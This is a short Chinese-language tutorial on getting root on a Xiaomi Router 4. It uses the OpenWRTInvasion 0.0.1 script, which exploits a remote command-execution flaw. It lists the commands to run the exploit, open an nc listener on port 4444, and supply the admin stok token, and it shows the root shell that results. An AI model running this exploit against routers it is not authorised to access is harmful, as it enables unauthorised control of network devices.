小米路由器4 root

前言:小米路由器4 官方并不提供开发版固件,所以我们便无法通过官方的方式开启 ssh ,但我们可以通过第三方手段来获取 root 权限。

  • 操作环境:macOS Big Sur 11.1
  • 工具:OpenWRTInvasion-0.0.1 此处注意,必须是 0.0.1 版本,最新版并不支持小米路由器4
  • 软件环境:Python3

具体操作如下:

首先下载 OpenWRTInvasion-0.0.1 并解压。

打开 终端窗口1 并输入:

1
2
cd OpenWRTInvasion-0.0.1
python3 remote_command_execution_vulnerability.py

然后根据提示,新开一个 终端窗口2 ,然后输入:

1
/usr/bin/nc -l 4444

然后回到 终端窗口1 ,按任意键继续。并根据提示,依次输入 路由器IP本机IPstok

stok 的获取方法如下:
先用浏览器登录路由器,在地址栏里便有 stok 的值,如下:

1
2
3
http://192.168.0.1/cgi-bin/luci/;stok=2bbc6d29fb952348f2a3baca502ce4b6/web/home#router

stok=2bbc6d29fb952348f2a3baca502ce4b6

然后再回到 终端窗口2 ,顺利的话,这时已经进入到路由器内部了,如下所示:

1
2
3
4
5
6
7
8
9
logan@ZL-MBP OpenWRTInvasion-0.0.1 % /usr/bin/nc -l 4444
/bin/sh: can't access tty; job control turned off


BusyBox v1.19.4 (2019-05-18 03:47:59 UTC) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/www/cgi-bin # cd /
/ #

而且现在便是 root 权限,修改内容需要倍加小心。

本文参考:https://github.com/acecilia/OpenWRTInvasion